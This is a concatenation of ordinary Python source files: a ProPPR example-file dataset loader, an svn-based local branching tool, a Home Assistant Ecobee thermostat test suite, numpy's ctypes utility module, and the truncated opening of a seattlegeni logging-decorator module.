functorToLearn = declare.asMode(functorToLearn)
xrows = []
yrows = []
m = db.matEncoding[(functorInDB,2)].tocoo()
n = db.dim()
for i in range(len(m.data)):
x = m.row[i]
xrows.append(SS.csr_matrix( ([1.0],([0],[x])), shape=(1,n) ))
rx = m.getrow(x)
yrows.append(rx * (1.0/rx.sum()))
return Dataset({functorToLearn:mutil.stack(xrows)},{functorToLearn:mutil.stack(yrows)})
@staticmethod
def _parseLine(line,proppr=True):
#returns mode, x, positive y's where x and ys are symbols
if not line.strip() or line[0]=='#':
return None,None,None
parts = line.strip().split("\t")
if not proppr:
assert len(parts)>=2, 'bad line: %r parts %r' % (line,parts)
return declare.asMode(parts[0]+"/io"),parts[1],parts[2:]
else:
regex = re.compile('(\w+)\((\w+),(\w+)\)')
mx = regex.search(parts[0])
if not mx:
return None,None,None
else:
mode = declare.asMode(mx.group(1)+"/io")
x = mx.group(2)
pos = []
for ans in parts[1:]:
label = ans[0]
my = regex.search(ans[1:])
assert my,'problem at line '+line
assert my.group(1)==mode.functor,'mismatched modes %s %s at line %s' % (my.group(1),mode,line)
assert my.group(2)==x,'mismatched x\'s at line '+line
if label=='+':
pos.append(my.group(3))
return mode,x,pos
@staticmethod
def loadProPPRExamples(db,fileName):
"""Convert a proppr-style foo.examples file to a two dictionaries of
modename->matrix pairs, one for the Xs, one for the Ys"""
return Dataset.loadExamples(db,fileName,proppr=True)
@staticmethod
def loadExamples(db,fileName,proppr=False):
"""Convert foo.exam file, where each line is of the form
functor <TAB> x <TAB> y1 ... yk
to two dictionaries of modename->matrix pairs, one for the Xs,
one for the Ys.
"""
logging.info('loading examples from '+ str(fileName))
# map from relation to lists that buffer data,row
# index,colindex information for each of the X,Y matrices
xDatabuf = collections.defaultdict(list)
xRowbuf = collections.defaultdict(list)
xColbuf = collections.defaultdict(list)
yDatabuf = collections.defaultdict(list)
yRowbuf = collections.defaultdict(list)
yColbuf = collections.defaultdict(list)
xsResult = {}
ysResult = {}
def getId(typeName,symbol):
s = symbol if db.schema.hasId(typeName,symbol) else matrixdb.OOV_ENTITY_NAME
return db.schema.getId(typeName,s)
for line in util.linesIn(fileName):
pred,x,ys = Dataset._parseLine(line,proppr=proppr)
if pred:
xType = db.schema.getDomain(pred.getFunctor(),2)
yType = db.schema.getRange(pred.getFunctor(),2)
row_index = len(xDatabuf[pred])
xDatabuf[pred].append(1.0)
xRowbuf[pred].append(row_index)
xColbuf[pred].append(getId(xType,x))
for y in ys:
yDatabuf[pred].append( 1.0/len(ys) if conf.normalize_outputs else 1.0)
yRowbuf[pred].append(row_index)
yColbuf[pred].append(getId(yType,y))
for pred in list(xDatabuf.keys()):
xType = db.schema.getDomain(pred.getFunctor(),2)
yType = db.schema.getRange(pred.getFunctor(),2)
nrows = len(xDatabuf[pred])
coo_x = SS.coo_matrix((xDatabuf[pred],(xRowbuf[pred],xColbuf[pred])), shape=(nrows,db.dim(xType)))
xsResult[pred] = SS.csr_matrix(coo_x,dtype='float32')
coo_y = SS.coo_matrix((yDatabuf[pred],(yRowbuf[pred],yColbuf[pred])), shape=(nrows,db.dim(yType)))
ysResult[pred] = SS.csr_matrix(coo_y,dtype='float32')
dset = Dataset(xsResult,ysResult)
logging.info('loaded dataset has %d modes and %d non-zeros' % (len(dset.modesToLearn()), dset.size()))
logging.info('in loaded dataset, example normalization (so sum_{y} score[pred(x,y)] == 1) is %r' % conf.normalize_outputs)
return dset
#TODO refactor to also save examples in form: 'functor X Y1
#... Yk'
def saveProPPRExamples(self,fileName,db,append=False,mode=None):
"""Convert X and Y to ProPPR examples and store in a file."""
fp = open(fileName,'a' if append else 'w')
modeKeys = [mode] if mode else list(self.xDict.keys())
for mode in modeKeys:
assert mode in self.yDict, "No mode '%s' in yDict" % mode
functor,arity = mode.getFunctor(),mode.getArity()
dx = db.matrixAsSymbolDict(self.xDict[mode],db.schema.getDomain(functor,arity))
dy = db.matrixAsSymbolDict(self.yDict[mode],db.schema.getRange(functor,arity))
theoryPred = mode.functor
for i in range(max(dx.keys())+1):
dix = dx[i]
diy = dy[i]
assert len(list(dix.keys()))==1,'X row %d is not onehot: %r' % (i,dix)
x = list(dix.keys())[0]
fp.write('%s(%s,Y)' % (theoryPred,x))
for y in list(diy.keys()):
fp.write('\t+%s(%s,%s)' % (theoryPred,x,y))
fp.write('\n')
if __name__ == "__main__":
usage = 'usage: python -m dataset.py --serialize foo.cfacts|foo.db bar.exam|bar.examples glob.dset'
if sys.argv[1]=='--serialize':
assert len(sys.argv)==5,usage
dbFile = sys.argv[2]
examFile = sys.argv[3]
dsetFile = sys.argv[4]
if dbFile.endswith(".cfacts"):
db = matrixdb.MatrixDB.loadFile(dbFile)
elif dbFile.endswith(".db"):
db = matrixdb.MatrixDB.deserialize(dbFile)
else:
assert False,usage
assert examFile.endswith(".examples") or examFile.endswith(".exam"),usage
dset = Dataset.loadExamples(db,examFile,proppr=examFile.endswith(".examples"))
dset.serialize(dsetFile)
|
|
# Copyright 2015, The Lvn Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import logging
import os
import sys
import subprocess
import tempfile
_logger = logging.getLogger(__name__)
class Branch(object):
def __init__(self, name, json_object=None):
self.name = name
if json_object is None:
self.patch_file = None
return
self.patch_file = json_object.get('patch_file')
def ToJson(self):
result = {}
if self.patch_file is not None:
result['patch_file'] = self.patch_file
return result
def Rename(self, patch_dir, name):
self.name = name
if self.patch_file is not None:
new_patch_file = name + '.patch'
os.rename(os.path.join(patch_dir, self.patch_file),
os.path.join(patch_dir, new_patch_file))
self.patch_file = new_patch_file
class Lvn(object):
def __init__(self, lvn_file=None):
if lvn_file is None:
self.current_branch = 'master-1'
self.branches = {}
self.branches[self.current_branch] = Branch(self.current_branch)
return
self.lvn_dir, _ = os.path.split(lvn_file)
self.svn_dir = os.path.abspath(os.path.join(self.lvn_dir, '..'))
self.tmp_dir = os.path.join(self.svn_dir, 'tmp')
self.top_dir = os.path.abspath(os.path.join(self.lvn_dir, '..', '..'))
with open(lvn_file, 'r') as lvn_json_file:
json_obj = json.loads(lvn_json_file.read())
self.current_branch = json_obj['current_branch']
self.branches = {}
for key, value in json_obj['branches'].iteritems():
self.branches[key] = Branch(key, value)
def Save(self, lvn_file=None):
if lvn_file is None:
lvn_file = os.path.join(self.lvn_dir, 'lvn.json')
json_obj = {}
json_obj['current_branch'] = self.current_branch
branches = {}
for key, branch in self.branches.iteritems():
branches[key] = branch.ToJson()
json_obj['branches'] = branches
with open(lvn_file, 'w') as lvn_json_file:
json.dump(json_obj, lvn_json_file)
def RenameBranch(self, old_name, new_name):
branch = self.branches[old_name]
del self.branches[old_name]
branch.Rename(self.lvn_dir, new_name)
self.branches[new_name] = branch
if self.current_branch == old_name:
self.current_branch = new_name
def SaveCurrentBranch(self):
_logger.debug('Saving current patch')
branch = self.branches[self.current_branch]
if branch.patch_file is None:
branch.patch_file = branch.name + '.patch'
with open(os.path.join(self.lvn_dir, branch.patch_file), 'w') as patch_file:
ret = subprocess.call(['svn', 'diff'], cwd=self.top_dir, stdout=patch_file)
if ret != 0:
raise Exception('svn diff failed')
def Revert(self):
_logger.debug('Reverting changes')
p = subprocess.Popen(['svn', 'status'], cwd=self.top_dir, stdout=subprocess.PIPE)
added = []
for line in p.stdout:
if line.startswith('A'):
added.append(line[8:].strip())
if p.wait() != 0:
raise Exception('svn status failed')
ret = subprocess.call(['svn', 'revert', '-R', self.top_dir], cwd=self.top_dir)
if ret != 0:
raise Exception('svn revert failed')
for p in reversed(added):
p = os.path.join(self.top_dir, p)
try:
if os.path.isdir(p):
sys.stderr.write('Removing dir %r\n' % p)
os.rmdir(p)
else:
sys.stderr.write('Removing file %r\n' % p)
os.unlink(p)
except OSError, e:
sys.stderr.write(str(e) + '\n')
def RestoreBranch(self):
_logger.debug('Restoring changes from patch')
branch = self.branches[self.current_branch]
if branch.patch_file is None:
return
patch_file_name = os.path.join(self.lvn_dir, branch.patch_file)
ret = subprocess.call(['svn', 'patch', patch_file_name], cwd=self.top_dir)
if ret != 0:
raise Exception('svn apply failed')
def Delete(self, branch_name):
branch = self.branches[branch_name]
del self.branches[branch_name]
if branch.patch_file is not None:
os.remove(os.path.join(self.lvn_dir, branch.patch_file))
def SaveNonTracked(self):
"""Saves non-tracked files and directories to an archive."""
_logger.debug('Archiving non-tracked files')
p = subprocess.Popen(['svn', 'status'], cwd=self.top_dir, stdout=subprocess.PIPE)
paths = []
for line in p.stdout:
if line.startswith('?'):
paths.append(line[8:].strip())
if p.wait() != 0:
raise Exception('svn status failed')
if not paths:
_logger.debug('No non-tracked files')
return None
archive_fd, archive_name = tempfile.mkstemp(dir=self.tmp_dir, suffix='.cpio')
_logger.debug('Archive name: %r', archive_name)
try:
cmd_find = ['find']
cmd_find.extend(paths)
p_find = subprocess.Popen(cmd_find, cwd=self.top_dir, stdout=subprocess.PIPE)
cmd_cpio = ['cpio', '-o']
p_cpio = subprocess.Popen(cmd_cpio, cwd=self.top_dir, stdin=p_find.stdout, stdout=archive_fd)
finally:
os.close(archive_fd)
if p_find.wait() != 0:
raise Exception('find failed')
if p_cpio.wait() != 0:
raise Exception('cpio failed')
return archive_name
def Clean(self):
"""Removes non-tracked files and dirs from working tree."""
_logger.debug('Cleaning non-tracked files')
p = subprocess.Popen(['svn', 'status'], cwd=self.top_dir, stdout=subprocess.PIPE)
paths = []
for line in p.stdout:
if line.startswith('?'):
paths.append(line[8:].strip())
if p.wait() != 0:
raise Exception('svn status failed')
if not paths:
_logger.debug('No non-tracked files')
return
cmd_find = ['find']
cmd_find.extend(paths)
cmd_find.append('-delete')
p_find = subprocess.Popen(cmd_find, cwd=self.top_dir)
if p_find.wait() != 0:
raise Exception('find failed')
def RestoreNonTracked(self, archive_name):
_logger.debug('Restoring non-tracked files')
if not (archive_name and os.path.exists(archive_name)):
_logger.debug('No archive. Skipping restoring non-tracked files')
return
cmd_cpio = ['cpio', '-i', '-d']
with open(archive_name, 'rb') as archive:
p_cpio = subprocess.Popen(cmd_cpio, cwd=self.top_dir, stdin=archive, stderr=open(os.devnull, 'wb'))
if p_cpio.wait() != 0:
raise Exception('cpio failed')
os.remove(archive_name)
def GetSvnDir(working_dir):
while working_dir != ' ' and working_dir != '/':
svn_dir = os.path.join(working_dir, '.svn')
if os.path.isdir(svn_dir):
return svn_dir
working_dir, _ = os.path.split(working_dir)
return None
def GetLvnDir(working_dir):
svn_dir = GetSvnDir(working_dir)
if svn_dir is not None:
lvn_dir = os.path.join(svn_dir, 'lvn')
if os.path.isdir(lvn_dir):
return lvn_dir
return None
def GetLvn(working_dir):
svn_dir = GetSvnDir(working_dir)
if svn_dir is None:
print 'svn repository not found'
return None
lvn_dir = os.path.join(svn_dir, 'lvn')
if not os.path.isdir(lvn_dir):
print 'lvn is not initialized, run lvn init'
return None
lvn_file = os.path.join(lvn_dir, 'lvn.json')
if not os.path.exists(lvn_file):
print 'lvn is not initialized, run lvn init'
return None
return Lvn(lvn_file)
|
|
"""The test for the Ecobee thermostat module."""
from unittest import mock
import pytest
from homeassistant.components.ecobee import climate as ecobee
import homeassistant.const as const
from homeassistant.const import STATE_OFF
@pytest.fixture
def ecobee_fixture():
"""Set up ecobee mock."""
vals = {
"name": "Ecobee",
"program": {
"climates": [
{"name": "Climate1", "climateRef": "c1"},
{"name": "Climate2", "climateRef": "c2"},
],
"currentClimateRef": "c1",
},
"runtime": {
"actualTemperature": 300,
"actualHumidity": 15,
"desiredHeat": 400,
"desiredCool": 200,
"desiredFanMode": "on",
},
"settings": {
"hvacMode": "auto",
"heatStages": 1,
"coolStages": 1,
"fanMinOnTime": 10,
"heatCoolMinDelta": 50,
"holdAction": "nextTransition",
},
"equipmentStatus": "fan",
"events": [
{
"name": "Event1",
"running": True,
"type": "hold",
"holdClimateRef": "away",
"endDate": "2017-01-01 10:00:00",
"startDate": "2017-02-02 11:00:00",
}
],
}
mock_ecobee = mock.Mock()
mock_ecobee.__getitem__ = mock.Mock(side_effect=vals.__getitem__)
mock_ecobee.__setitem__ = mock.Mock(side_effect=vals.__setitem__)
return mock_ecobee
@pytest.fixture(name="data")
def data_fixture(ecobee_fixture):
"""Set up data mock."""
data = mock.Mock()
data.ecobee.get_thermostat.return_value = ecobee_fixture
return data
@pytest.fixture(name="thermostat")
def thermostat_fixture(data):
"""Set up ecobee thermostat object."""
return ecobee.Thermostat(data, 1)
async def test_name(thermostat):
"""Test name property."""
assert thermostat.name == "Ecobee"
async def test_current_temperature(ecobee_fixture, thermostat):
"""Test current temperature."""
assert thermostat.current_temperature == 30
ecobee_fixture["runtime"]["actualTemperature"] = const.HTTP_NOT_FOUND
assert thermostat.current_temperature == 40.4
async def test_target_temperature_low(ecobee_fixture, thermostat):
"""Test target low temperature."""
assert thermostat.target_temperature_low == 40
ecobee_fixture["runtime"]["desiredHeat"] = 502
assert thermostat.target_temperature_low == 50.2
async def test_target_temperature_high(ecobee_fixture, thermostat):
"""Test target high temperature."""
assert thermostat.target_temperature_high == 20
ecobee_fixture["runtime"]["desiredCool"] = 103
assert thermostat.target_temperature_high == 10.3
async def test_target_temperature(ecobee_fixture, thermostat):
"""Test target temperature."""
assert thermostat.target_temperature is None
ecobee_fixture["settings"]["hvacMode"] = "heat"
assert thermostat.target_temperature == 40
ecobee_fixture["settings"]["hvacMode"] = "cool"
assert thermostat.target_temperature == 20
ecobee_fixture["settings"]["hvacMode"] = "auxHeatOnly"
assert thermostat.target_temperature == 40
ecobee_fixture["settings"]["hvacMode"] = "off"
assert thermostat.target_temperature is None
async def test_desired_fan_mode(ecobee_fixture, thermostat):
"""Test desired fan mode property."""
assert thermostat.fan_mode == "on"
ecobee_fixture["runtime"]["desiredFanMode"] = "auto"
assert thermostat.fan_mode == "auto"
async def test_fan(ecobee_fixture, thermostat):
"""Test fan property."""
assert const.STATE_ON == thermostat.fan
ecobee_fixture["equipmentStatus"] = ""
assert thermostat.fan == STATE_OFF
ecobee_fixture["equipmentStatus"] = "heatPump, heatPump2"
assert thermostat.fan == STATE_OFF
async def test_hvac_mode(ecobee_fixture, thermostat):
"""Test current operation property."""
assert thermostat.hvac_mode == "heat_cool"
ecobee_fixture["settings"]["hvacMode"] = "heat"
assert thermostat.hvac_mode == "heat"
ecobee_fixture["settings"]["hvacMode"] = "cool"
assert thermostat.hvac_mode == "cool"
ecobee_fixture["settings"]["hvacMode"] = "auxHeatOnly"
assert thermostat.hvac_mode == "heat"
ecobee_fixture["settings"]["hvacMode"] = "off"
assert thermostat.hvac_mode == "off"
async def test_hvac_modes(thermostat):
"""Test operation list property."""
assert ["heat_cool", "heat", "cool", "off"] == thermostat.hvac_modes
async def test_hvac_mode2(ecobee_fixture, thermostat):
"""Test operation mode property."""
assert thermostat.hvac_mode == "heat_cool"
ecobee_fixture["settings"]["hvacMode"] = "heat"
assert thermostat.hvac_mode == "heat"
async def test_extra_state_attributes(ecobee_fixture, thermostat):
"""Test device state attributes property."""
ecobee_fixture["equipmentStatus"] = "heatPump2"
assert {
"fan": "off",
"climate_mode": "Climate1",
"fan_min_on_time": 10,
"equipment_running": "heatPump2",
} == thermostat.extra_state_attributes
ecobee_fixture["equipmentStatus"] = "auxHeat2"
assert {
"fan": "off",
"climate_mode": "Climate1",
"fan_min_on_time": 10,
"equipment_running": "auxHeat2",
} == thermostat.extra_state_attributes
ecobee_fixture["equipmentStatus"] = "compCool1"
assert {
"fan": "off",
"climate_mode": "Climate1",
"fan_min_on_time": 10,
"equipment_running": "compCool1",
} == thermostat.extra_state_attributes
ecobee_fixture["equipmentStatus"] = ""
assert {
"fan": "off",
"climate_mode": "Climate1",
"fan_min_on_time": 10,
"equipment_running": "",
} == thermostat.extra_state_attributes
ecobee_fixture["equipmentStatus"] = "Unknown"
assert {
"fan": "off",
"climate_mode": "Climate1",
"fan_min_on_time": 10,
"equipment_running": "Unknown",
} == thermostat.extra_state_attributes
ecobee_fixture["program"]["currentClimateRef"] = "c2"
assert {
"fan": "off",
"climate_mode": "Climate2",
"fan_min_on_time": 10,
"equipment_running": "Unknown",
} == thermostat.extra_state_attributes
async def test_is_aux_heat_on(ecobee_fixture, thermostat):
"""Test aux heat property."""
assert not thermostat.is_aux_heat
ecobee_fixture["equipmentStatus"] = "fan, auxHeat"
assert thermostat.is_aux_heat
async def test_set_temperature(ecobee_fixture, thermostat, data):
"""Test set temperature."""
# Auto -> Auto
data.reset_mock()
thermostat.set_temperature(target_temp_low=20, target_temp_high=30)
data.ecobee.set_hold_temp.assert_has_calls(
[mock.call(1, 30, 20, "nextTransition", None)]
)
# Auto -> Hold
data.reset_mock()
thermostat.set_temperature(temperature=20)
data.ecobee.set_hold_temp.assert_has_calls(
[mock.call(1, 25, 15, "nextTransition", None)]
)
# Cool -> Hold
data.reset_mock()
ecobee_fixture["settings"]["hvacMode"] = "cool"
thermostat.set_temperature(temperature=20.5)
data.ecobee.set_hold_temp.assert_has_calls(
[mock.call(1, 20.5, 20.5, "nextTransition", None)]
)
# Heat -> Hold
data.reset_mock()
ecobee_fixture["settings"]["hvacMode"] = "heat"
thermostat.set_temperature(temperature=20)
data.ecobee.set_hold_temp.assert_has_calls(
[mock.call(1, 20, 20, "nextTransition", None)]
)
# Heat -> Auto
data.reset_mock()
ecobee_fixture["settings"]["hvacMode"] = "heat"
thermostat.set_temperature(target_temp_low=20, target_temp_high=30)
assert not data.ecobee.set_hold_temp.called
async def test_set_hvac_mode(thermostat, data):
"""Test operation mode setter."""
data.reset_mock()
thermostat.set_hvac_mode("heat_cool")
data.ecobee.set_hvac_mode.assert_has_calls([mock.call(1, "auto")])
data.reset_mock()
thermostat.set_hvac_mode("heat")
data.ecobee.set_hvac_mode.assert_has_calls([mock.call(1, "heat")])
async def test_set_fan_min_on_time(thermostat, data):
"""Test fan min on time setter."""
data.reset_mock()
thermostat.set_fan_min_on_time(15)
data.ecobee.set_fan_min_on_time.assert_has_calls([mock.call(1, 15)])
data.reset_mock()
thermostat.set_fan_min_on_time(20)
data.ecobee.set_fan_min_on_time.assert_has_calls([mock.call(1, 20)])
async def test_resume_program(thermostat, data):
"""Test resume program."""
# False
data.reset_mock()
thermostat.resume_program(False)
data.ecobee.resume_program.assert_has_calls([mock.call(1, "false")])
data.reset_mock()
thermostat.resume_program(None)
data.ecobee.resume_program.assert_has_calls([mock.call(1, "false")])
data.reset_mock()
thermostat.resume_program(0)
data.ecobee.resume_program.assert_has_calls([mock.call(1, "false")])
# True
data.reset_mock()
thermostat.resume_program(True)
data.ecobee.resume_program.assert_has_calls([mock.call(1, "true")])
data.reset_mock()
thermostat.resume_program(1)
data.ecobee.resume_program.assert_has_calls([mock.call(1, "true")])
async def test_hold_preference(ecobee_fixture, thermostat):
"""Test hold preference."""
ecobee_fixture["settings"]["holdAction"] = "indefinite"
assert thermostat.hold_preference() == "indefinite"
for action in ["useEndTime2hour", "useEndTime4hour"]:
ecobee_fixture["settings"]["holdAction"] = action
assert thermostat.hold_preference() == "holdHours"
for action in [
"nextPeriod",
"askMe",
]:
ecobee_fixture["settings"]["holdAction"] = action
assert thermostat.hold_preference() == "nextTransition"
def test_hold_hours(ecobee_fixture, thermostat):
"""Test hold hours preference."""
ecobee_fixture["settings"]["holdAction"] = "useEndTime2hour"
assert thermostat.hold_hours() == 2
ecobee_fixture["settings"]["holdAction"] = "useEndTime4hour"
assert thermostat.hold_hours() == 4
for action in [
"nextPeriod",
"indefinite",
"askMe",
]:
ecobee_fixture["settings"]["holdAction"] = action
assert thermostat.hold_hours() is None
async def test_set_fan_mode_on(thermostat, data):
"""Test set fan mode to on."""
data.reset_mock()
thermostat.set_fan_mode("on")
data.ecobee.set_fan_mode.assert_has_calls(
[mock.call(1, "on", 20, 40, "nextTransition")]
)
async def test_set_fan_mode_auto(thermostat, data):
"""Test set fan mode to auto."""
data.reset_mock()
thermostat.set_fan_mode("auto")
data.ecobee.set_fan_mode.assert_has_calls(
[mock.call(1, "auto", 20, 40, "nextTransition")]
)
|
|
"""
============================
``ctypes`` Utility Functions
============================
See Also
---------
load_library : Load a C library.
ndpointer : Array restype/argtype with verification.
as_ctypes : Create a ctypes array from an ndarray.
as_array : Create an ndarray from a ctypes array.
References
----------
.. [1] "SciPy Cookbook: ctypes", http://www.scipy.org/Cookbook/Ctypes
Examples
--------
Load the C library:
>>> _lib = np.ctypeslib.load_library('libmystuff', '.') #DOCTEST: +ignore
Our result type, an ndarray that must be of type double, be 1-dimensional
and is C-contiguous in memory:
>>> array_1d_double = np.ctypeslib.ndpointer(
... dtype=np.double,
... ndim=1, flags='CONTIGUOUS') #DOCTEST: +ignore
Our C-function typically takes an array and updates its values
in-place. For example::
void foo_func(double* x, int length)
{
int i;
for (i = 0; i < length; i++) {
x[i] = i*i;
}
}
We wrap it using:
>>> lib.foo_func.restype = None #DOCTEST: +ignore
>>> lib.foo.argtypes = [array_1d_double, c_int] #DOCTEST: +ignore
Then, we're ready to call ``foo_func``:
>>> out = np.empty(15, dtype=np.double)
>>> _lib.foo_func(out, len(out)) #DOCTEST: +ignore
"""
__all__ = ['load_library', 'ndpointer', 'test', 'ctypes_load_library',
'c_intp', 'as_ctypes', 'as_array']
import sys, os
from numpy import integer, ndarray, dtype as _dtype, deprecate, array
from numpy.core.multiarray import _flagdict, flagsobj
try:
import ctypes
except ImportError:
ctypes = None
if ctypes is None:
def _dummy(*args, **kwds):
raise ImportError, "ctypes is not available."
ctypes_load_library = _dummy
load_library = _dummy
as_ctypes = _dummy
as_array = _dummy
from numpy import intp as c_intp
else:
import numpy.core._internal as nic
c_intp = nic._getintp_ctype()
del nic
# Adapted from Albert Strasheim
def load_library(libname, loader_path):
if ctypes.__version__ < '1.0.1':
import warnings
warnings.warn("All features of ctypes interface may not work " \
"with ctypes < 1.0.1")
ext = os.path.splitext(libname)[1]
if not ext:
# Try to load library with platform-specific name, otherwise
# default to libname.[so|pyd]. Sometimes, these files are built
# erroneously on non-linux platforms.
libname_ext = ['%s.so' % libname, '%s.pyd' % libname]
if sys.platform == 'win32':
libname_ext.insert(0, '%s.dll' % libname)
elif sys.platform == 'darwin':
libname_ext.insert(0, '%s.dylib' % libname)
else:
libname_ext = [libname]
loader_path = os.path.abspath(loader_path)
if not os.path.isdir(loader_path):
libdir = os.path.dirname(loader_path)
else:
libdir = loader_path
for ln in libname_ext:
try:
libpath = os.path.join(libdir, ln)
return ctypes.cdll[libpath]
except OSError, e:
pass
raise e
ctypes_load_library = deprecate(load_library, 'ctypes_load_library',
'load_library')
def _num_fromflags(flaglist):
num = 0
for val in flaglist:
num += _flagdict[val]
return num
_flagnames = ['C_CONTIGUOUS', 'F_CONTIGUOUS', 'ALIGNED', 'WRITEABLE',
'OWNDATA', 'UPDATEIFCOPY']
def _flags_fromnum(num):
res = []
for key in _flagnames:
value = _flagdict[key]
if (num & value):
res.append(key)
return res
class _ndptr(object):
def from_param(cls, obj):
if not isinstance(obj, ndarray):
raise TypeError, "argument must be an ndarray"
if cls._dtype_ is not None \
and obj.dtype != cls._dtype_:
raise TypeError, "array must have data type %s" % cls._dtype_
if cls._ndim_ is not None \
and obj.ndim != cls._ndim_:
raise TypeError, "array must have %d dimension(s)" % cls._ndim_
if cls._shape_ is not None \
and obj.shape != cls._shape_:
raise TypeError, "array must have shape %s" % str(cls._shape_)
if cls._flags_ is not None \
and ((obj.flags.num & cls._flags_) != cls._flags_):
raise TypeError, "array must have flags %s" % \
_flags_fromnum(cls._flags_)
return obj.ctypes
from_param = classmethod(from_param)
# Factory for an array-checking class with from_param defined for
# use with ctypes argtypes mechanism
_pointer_type_cache = {}
def ndpointer(dtype=None, ndim=None, shape=None, flags=None):
"""
Array-checking restype/argtypes.
An ndpointer instance is used to describe an ndarray in restypes
and argtypes specifications. This approach is more flexible than
using, for example, ``POINTER(c_double)``, since several restrictions
can be specified, which are verified upon calling the ctypes function.
These include data type, number of dimensions, shape and flags. If a
given array does not satisfy the specified restrictions,
a ``TypeError`` is raised.
Parameters
----------
dtype : data-type, optional
Array data-type.
ndim : int, optional
Number of array dimensions.
shape : tuple of ints, optional
Array shape.
flags : string or tuple of strings
Array flags; may be one or more of:
- C_CONTIGUOUS / C / CONTIGUOUS
- F_CONTIGUOUS / F / FORTRAN
- OWNDATA / O
- WRITEABLE / W
- ALIGNED / A
- UPDATEIFCOPY / U
Examples
--------
>>> clib.somefunc.argtypes = [np.ctypeslib.ndpointer(dtype=float64,
... ndim=1,
... flags='C_CONTIGUOUS')]
>>> clib.somefunc(np.array([1, 2, 3], dtype=np.float64))
"""
if dtype is not None:
dtype = _dtype(dtype)
num = None
if flags is not None:
if isinstance(flags, str):
flags = flags.split(',')
elif isinstance(flags, (int, integer)):
num = flags
flags = _flags_fromnum(num)
elif isinstance(flags, flagsobj):
num = flags.num
flags = _flags_fromnum(num)
if num is None:
try:
flags = [x.strip().upper() for x in flags]
except:
raise TypeError, "invalid flags specification"
num = _num_fromflags(flags)
try:
return _pointer_type_cache[(dtype, ndim, shape, num)]
except KeyError:
pass
if dtype is None:
name = 'any'
elif dtype.names:
name = str(id(dtype))
else:
name = dtype.str
if ndim is not None:
name += "_%dd" % ndim
if shape is not None:
try:
strshape = [str(x) for x in shape]
except TypeError:
strshape = [str(shape)]
shape = (shape,)
shape = tuple(shape)
name += "_"+"x".join(strshape)
if flags is not None:
name += "_"+"_".join(flags)
else:
flags = []
klass = type("ndpointer_%s"%name, (_ndptr,),
{"_dtype_": dtype,
"_shape_" : shape,
"_ndim_" : ndim,
"_flags_" : num})
_pointer_type_cache[dtype] = klass
return klass
if ctypes is not None:
ct = ctypes
################################################################
# simple types
# maps the numpy typecodes like '<f8' to simple ctypes types like
# c_double. Filled in by prep_simple.
_typecodes = {}
def prep_simple(simple_type, typestr):
"""Given a ctypes simple type, construct and attach an
__array_interface__ property to it if it does not yet have one.
"""
try: simple_type.__array_interface__
except AttributeError: pass
else: return
_typecodes[typestr] = simple_type
def __array_interface__(self):
return {'descr': [('', typestr)],
'__ref': self,
'strides': None,
'shape': (),
'version': 3,
'typestr': typestr,
'data': (ct.addressof(self), False),
}
simple_type.__array_interface__ = property(__array_interface__)
if sys.byteorder == "little":
TYPESTR = "<%c%d"
else:
TYPESTR = ">%c%d"
simple_types = [
((ct.c_byte, ct.c_short, ct.c_int, ct.c_long, ct.c_longlong), "i"),
((ct.c_ubyte, ct.c_ushort, ct.c_uint, ct.c_ulong, ct.c_ulonglong), "u"),
((ct.c_float, ct.c_double), "f"),
]
# Prep that numerical ctypes types:
for types, code in simple_types:
for tp in types:
prep_simple(tp, TYPESTR % (code, ct.sizeof(tp)))
################################################################
# array types
_ARRAY_TYPE = type(ct.c_int * 1)
def prep_array(array_type):
"""Given a ctypes array type, construct and attach an
__array_interface__ property to it if it does not yet have one.
"""
try: array_type.__array_interface__
except AttributeError: pass
else: return
shape = []
ob = array_type
while type(ob) == _ARRAY_TYPE:
shape.append(ob._length_)
ob = ob._type_
shape = tuple(shape)
ai = ob().__array_interface__
descr = ai['descr']
typestr = ai['typestr']
def __array_interface__(self):
return {'descr': descr,
'__ref': self,
'strides': None,
'shape': shape,
'version': 3,
'typestr': typestr,
'data': (ct.addressof(self), False),
}
array_type.__array_interface__ = property(__array_interface__)
################################################################
# public functions
def as_array(obj):
"""Create a numpy array from a ctypes array. The numpy array
shares the memory with the ctypes object."""
tp = type(obj)
try: tp.__array_interface__
except AttributeError: prep_array(tp)
return array(obj, copy=False)
def as_ctypes(obj):
"""Create and return a ctypes object from a numpy array. Actually
anything that exposes the __array_interface__ is accepted."""
ai = obj.__array_interface__
if ai["strides"]:
raise TypeError("strided arrays not supported")
if ai["version"] != 3:
raise TypeError("only __array_interface__ version 3 supported")
addr, readonly = ai["data"]
if readonly:
raise TypeError("readonly arrays unsupported")
tp = _typecodes[ai["typestr"]]
for dim in ai["shape"][::-1]:
tp = tp * dim
result = tp.from_address(addr)
result.__keep = ai
return result
|
|
"""
<Program>
decorators.py
<Started>
6 July 2009
<Author>
Justin Samuel
<Purpose>
These define the decorators used in seattlegeni code. Decorators are something
we try to avoid using, so they should only be used if absolutely necessary.
Currently we only use them for logging function calls (such as the public
api functions).
The simple_decorator approach here is borrowed from:
http://wiki.python.org/moin/PythonDecoratorLibrary
The general idea is that we have one simple_decorator that does magic python
stuff (_simple_decorator), and we write our actual decorators that are more
sane and are themselves decorated with the _simple_decorator.
"""
import datetime
from seattlegeni.common.util import log
from django.http import HttpRequest
def _simple_decorator(decorator):
"""
This is not for use outside of this module.
This decorator can be used to turn simple functions into well-behaved
decorators, so long as the decorators are fairly simple. If a decorator
expects a function and returns a function (no descriptors), and if it doesn't
modify function attributes or docstring, then it is eligible to use this.
Simply apply @simple_decorator to your decorator and it will automatically
preserve the docstring and function attributes of functions to which it is
applied.
"""
def new_decorator(f):
g = decorator(f)
g.__name__ = f.__name__
g.__doc__ = f.__doc__
g.__dict__.update(f.__dict__)
return g
# Now a few lines needed to make simple_decorator itself
# be a well-behaved decorator.
new_decorator.__name__ = decorator.__name__
new_decorator.__doc__ = decorator.__doc__
new_decorator.__dict__.update(decorator.__dict__)
return new_decorator
def _get_timedelta_str(starttime):
return str(datetime.datetime.now() - starttime)
@_simple_decorator
def log_function_call(func):
"""
<Purpose>
Logs when the function is called, along with the arguments, and logs when
the function returns, along with the return value. Will also log any
exception that is raised.
Be careful when using this to log functions that take sensitive values
(e.g. passwords) as arguments or that return sensitive values (e.g.
private keys).
"""
# The name "do_logging_func_call" is never seen anywhere but here.
def do_logging_func_call(*args, **kwargs):
_log_call_info(func, args, kwargs)
starttime = datetime.datetime.now()
try:
result = func(*args, **kwargs)
